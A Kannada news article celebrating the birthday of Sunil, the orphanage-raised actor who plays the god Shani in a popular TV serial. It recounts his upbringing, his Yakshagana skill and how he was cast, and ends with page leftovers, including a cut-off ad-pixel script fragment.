ಶನಿ ಧಾರವಾಹಿಯ ಕಲಾವಿದ ಶನಿ ಅಲಿಯಾಸ್ ಸುನೀಲ್​ಗೆ​ ಇಂದು ಜನ್ಮದಿನದ ಸಂಭ್ರಮ. ​ ಕಿರುತೆರೆಯ ಹೈ ಟಿಆರ್​ಪಿ ಧಾರವಾಹಿ  ಅಂದ್ರೆ ಅದು ‘ಶನಿ’ ಅಂತಾನೇ ಹೇಳ್ತಾರೆ  ವೀಕ್ಷಕರು. ಪೌರಾಣಿಕ ಕಥೆಯುಳ್ಳ ಶನಿಯಲ್ಲಿ ಮೋಸ್ಟ್​ ಫೇವರಿಟ್​ ಆ್ಯಕ್ಟರ್​ ಅಂದ್ರೆ ಅದು ಶನಿ ಅಲಿಯಾಸ್​ ಸುನೀಲ್​ ಅಂತಾನೇ ಹೇಳ್ತಾರೆ ಅಭಿಮಾನಿಗಳು.

ಶನಿ  ಒಬ್ಬ ಅನಾಥ ಹುಡುಗ ಎಂದರೆ ನೀವ್​ ನಂಬೋದಿಲ್ಲ. ಆದರೆ ಧಾರವಾಹಿ ಮೂಲಕ ತಮ್ಮ ಉತ್ತಮ ಆ್ಯಕ್ಟಿಂಗ್​ನಿಂದ ಎಲ್ಲರನ್ನು  ಮೆಚ್ಚುಗೆಗಳಿಸಿರುವ  ಶನಿಯ ಈ ಯುವಕ ಸದ್ಯ ಎಲ್ಲರ ಮನೆ ಮನೆಯ ಮಗ.

ಶನಿ ಪಾತ್ರಕ್ಕೆ ಇದೇ ವ್ಯಕ್ತಿತ್ವ ಬೇಕು, ಇದೇ ಮುಖ ಚಹರೆ ಬೇಕು ಅಂತಾ ನಿರ್ದೇಶಕರು ಹುಡುಕಿ ತಂದ ಹೊಸ ಪ್ರತಿಭೆ ಸುನೀಲ್​.ತ ನ್ನ ತೀಕ್ಷ್ಣ ಕಣ್ಣಿನ ನೋಟದಿಂದಲೇ, ಮುಖದ ಗಾಂಭೀರ್ಯದಿಂದ, ಅಮೋಘ ಡೈಲಾಗ್​ ಡೆಲಿವೆರಿ ಜೊತೆಗೆ  ಅಭಿನಯ ನೀಡಿ ವೀಕ್ಷಕರ ಮನ ಗೆದ್ದಿರುವ ಶನಿ ಅಲಿಯಾಸ್ ಸುನೀಲ್​​ಗೆ ಇಂದು  ಹುಟ್ಟುಹಬ್ಬದ ಸಂಭ್ರಮ.

ಶನಿ ಬೆಳೆದಿದ್ದು ಅನಾಥಾಶ್ರಮದಲ್ಲಿ….

ಸುನೀಲ್​  ಚಿಕ್ಕಂದಿನಿಂದಿಲೂ ಬೆಳೆದಿದ್ದು ದೀನ ಬಂಧು ಮಕ್ಕಳ  ಆಶ್ರಮದಲ್ಲಿ. ಈ ಆಶ್ರಮವನ್ನು ಕವಿ ಜಿ.ಎಸ್​. ಶಿವರುದ್ರಪ್ಪನವರ ಮಗ ಚಾಮರಾಜನಗರದಲ್ಲಿ ನಡೆಸಿಕೊಂಡು ಬರುತ್ತಿದ್ದಾರೆ. ಹತ್ತನೆ ತರಗಗತಿಯವರೆಗಿನ ವಿದ್ಯಾಭ್ಯಾಸವನ್ನು ಆಶ್ರಮದಿಂದಲೇ ಮುಗಿಸಿದ್ದಾನೆ ಸುನೀಲ್​. ಕೆಲ ಸಾಂಸ್ಕೃತಿಕ ಷಟುವಟಿಕೆಗಳಲ್ಲಿ ಭಾಗೀಯಾಗುತ್ತಿದ್ದ ಸುನೀಲ್​ಗೆ ಧಾರವಾಹಿಗೆ ಕ್ಯಾಮೆರಾ ಫೇಸ್​ ಮಾಡಲು ಮೊದ-ಮೊದಲು ಭಯ-ಆತಂಕ ಇತ್ತು. ಆ ನಂತರ ಅದು ಅಭ್ಯಾಸವಾಗುತ್ತಿದ್ದಂತೇ ಎಲ್ಲವೂ ಸಲೀಸು ಎನ್ನುತ್ತಾರೆ ಸುನೀಲ್​.

ಪಿಯು ಮಾಡುತ್ತಿರುವ ಸುನೀಲ್​ ಯಕ್ಷಗಾನ ಪ್ರವೀಣ. ಶನಿ ತಂಡ ಅಡಿಷನ್​ ಮಾಡುವಾಗ ಈ ಯುವಕ ಕಣ್ಣಿಗೆ  ಬಿದ್ದಿದ್ದಾನೆ. ಶನಿ ಬಗ್ಗೆ ಅಷ್ಟೇನು ಗೊತ್ತಿಲ್ಲದ ದೇವರ ಬಗ್ಗೆ ಪಾತ್ರ ಮಾಡುತ್ತಲೇ ತಿಳಿದುಕೊಂಡೆ ಎನ್ನುತ್ತಾರೆ ಸುನೀಲ್​.

ಆ ದೇವರು ಸುನೀಲ್​ಗೆ ಮತ್ತಷ್ಟು ಅವಕಾಶಗಳನ್ನು ದೊರಕುವಂತೆ ಮಾಡುಲೀ ಎಂಬುದು ನಮ್ಮೆಲ್ಲರ ಆಶಯ. ಒನ್ಸ್​ ಅಗೇನ್​ ಸುನೀಲ್​ ಹ್ಯಾಪಿ ಬರ್ತ್​ಡೇ.

 

Please follow and like us:
0
http://bp9news.com/wp-content/uploads/2018/06/29027207_549020112144774_8667057214322160253_n-1.jpghttp://bp9news.com/wp-content/uploads/2018/06/29027207_549020112144774_8667057214322160253_n-1-150x150.jpgBP9 Bureauಸಿನಿಮಾಶನಿ ಧಾರವಾಹಿಯ ಕಲಾವಿದ ಶನಿ ಅಲಿಯಾಸ್ ಸುನೀಲ್​ಗೆ​ ಇಂದು ಜನ್ಮದಿನದ ಸಂಭ್ರಮ. ​ ಕಿರುತೆರೆಯ ಹೈ ಟಿಆರ್​ಪಿ ಧಾರವಾಹಿ  ಅಂದ್ರೆ ಅದು ‘ಶನಿ' ಅಂತಾನೇ ಹೇಳ್ತಾರೆ  ವೀಕ್ಷಕರು. ಪೌರಾಣಿಕ ಕಥೆಯುಳ್ಳ ಶನಿಯಲ್ಲಿ ಮೋಸ್ಟ್​ ಫೇವರಿಟ್​ ಆ್ಯಕ್ಟರ್​ ಅಂದ್ರೆ ಅದು ಶನಿ ಅಲಿಯಾಸ್​ ಸುನೀಲ್​ ಅಂತಾನೇ ಹೇಳ್ತಾರೆ ಅಭಿಮಾನಿಗಳು. var domain = (window.location != window.parent.location)? document.referrer : document.location.href; var scpt=document.createElement('script'); var GetAttribute = 'afpftpPixel_'+(Math.floor((Math.random() * 500) +...Kannada News Portal